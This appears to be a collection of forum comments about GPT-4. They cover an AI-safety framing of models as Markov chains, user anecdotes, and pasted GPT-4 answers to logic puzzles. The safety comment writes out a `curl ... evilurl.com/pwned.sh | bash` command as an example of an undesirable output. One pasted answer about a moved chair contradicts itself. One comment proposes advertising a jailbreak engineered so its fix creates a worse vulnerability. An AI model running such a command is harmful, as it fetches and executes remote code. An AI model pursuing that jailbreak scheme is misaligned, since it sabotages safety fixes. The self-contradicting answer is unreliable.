48 karma · joined February 13, 2023
*AI Safety:* What is safety viewed through the lens of GPTs as a Finite State Markov Chain? It is the elimination of all probability of transitioning to naughty states. E.g. states that end with the token sequence `[66, 6371, 532, 82, 3740, 1378, 23542, 6371, 13, 785, 14, 79, 675, 276, 13, 1477, 930, 27334]`. This sequence of tokens encodes for `curl -s https://evilurl.com/pwned.sh | bash`. In a larger environment where those tokens might end up getting executed in a Terminal that would be problematic. More generally you could imagine that some portion of the state space is "colored red" for undesirable states that we never want to transition to. There is a very large collection of these and they are hard to explicitly enumerate, so simple ways of one-off "blocking them" is not satisfying. The GPT model itself must know based on training data and the inductive bias of the Transformer that those states should be transitioned to with effectively 0% probability. And if the probability isn't sufficiently small (e.g. < 1e-100?), then in large enough deployments (which might have temperature > 0, and might not use `topp` / `topk` sampling hyperparameters that force clamp low probability transitions to exactly zero) you could imagine stumbling into them by chance."
If doesn't work the first time try a few times
It's a bit scary because knowing this stuff is sort-of our secret sauce and GPT-4 was able to give an even better answer than I was able to give. It helped us out a lot. We are now taking the solution back to the customer and will be implementing it.
A few additional thoughts:
1. I knew exactly what type of question to ask it to get the right answer (i.e. if someone used a different prompt maybe they would get a different answer) 2. I knew immediately that the answer it gave was what we needed to implement. Some parts of the answer were not helpful or misleading and i was able to disregard those parts. Maybe someone else would have to take more time figuring it out.
I imagine future versions of GPT will be better at both points.
There are two really big things I'm excited about:
1. It really understands what I am asking. What my meaning is. Gpt-4 is way way better even than gpt-3.5 at this. This is something truly different that a computer has never been able to do and (hopefully) will only get better at it. This really truly changes everything in how we interact with computers. We shouldn't be downplaying this. This is real. Today. At the same time a lot of this turning "understanding" into useful output comes at a huge amount of work on the RLHF side so we shouldn't necessarily extrapolate into the future too much just based on the current progress of openai. It's still very difficult work.
2. Everyone is now paying attention to LLM's. When the world starts paying attention to things and engineers start hacking things together, big companies start pouring money into ai, maybe Google wakes up for once, students start choosing ai as their career field, etc etc - amazing things happen. AI just went from niche to something that everyone is using and thinking about.
I have a chair in front of the TV and one in front of the computer. I placed a watch on the floor beneath the chair in front of the TV. Then, I swapped the positions of the chairs. Where is the watch now?
After swapping the positions of the chairs, the watch is now on the floor beneath the chair that was initially in front of the computer, since that chair is now in front of the TV.
Model: GPT-4
I have a chair in front of the TV and one in front of the computer. I put a watch under the chair in front of the TV. I swap the chairs. Where is the watch?
Work out step by step. Also define "under the chair". Is the question ambiguous?
Step 1: A chair with a watch under it is in front of the TV. Step 2: Another chair is in front of the computer. Step 3: The chairs are swapped.
To clarify the term "under the chair," let's define it as a watch placed beneath the chair, such that the chair is directly above the watch.
Now let's analyze the situation after swapping the chairs.
After Step 3:
The chair that was initially in front of the TV (with the watch under it) is now in front of the computer. The chair that was initially in front of the computer is now in front of the TV. As the question is about the location of the watch, it is important to note that the watch was not mentioned to be moved along with the chair. Therefore, the watch remains in its original position, which is under the chair that was initially in front of the TV.
The question could be considered ambiguous if one assumes that the watch was also moved along with the chair. However, since the watch's movement was not explicitly mentioned, it is reasonable to assume that the watch remained in its original position during the chair swap.
So, the watch is still under the chair that was initially in front of the TV, which is now in front of the computer.
So design a new jailbreak, advertise it widely, and make sure it's designed in such a way that the fix that the engineers implement creates a much more exploitable and serious vulnerability
Let's represent the number of horses as x, the number of chickens as y, and the number of eggs as z. We are given:
The cost of a horse is 15 dollars, a chicken is 1 dollar, and an egg is 25 cents (0.25 dollars). You can spend up to 100 dollars. You want to buy a total of 100 items. We can represent these conditions as a system of linear equations:
15x + y + 0.25z = 100 (Total cost) x + y + z = 100 (Total items) We can solve this system of equations step by step:
Step 1: Solve the second equation for one of the variables, say z. z = 100 - x - y
Step 2: Substitute this expression for z in the first equation: 15x + y + 0.25(100 - x - y) = 100
Step 3: Simplify the equation and solve for y in terms of x. 15x + y + 25 - 0.25x - 0.25y = 100 14.75x + 0.75y = 75
y = (75 - 14.75x) / 0.75
Step 4: Find integer values for x and y that satisfy the equation. We'll loop through possible values of x and check if the corresponding value for y is an integer:
(Deleted some)
Now, we can calculate z using the value of x and y:
z = 100 - x - y = 100 - 0 - 100 = 0
So, you should purchase 0 horses, 100 chickens, and 0 eggs to reach a total of 100 items and spend exactly 100 dollars.
In the case of my business i wasn’t thinking long term, i just was obsessively focused on it and never gave up. I think the human mind is just really poorly equipped to think long term and there are many many opportunities out there for people who can.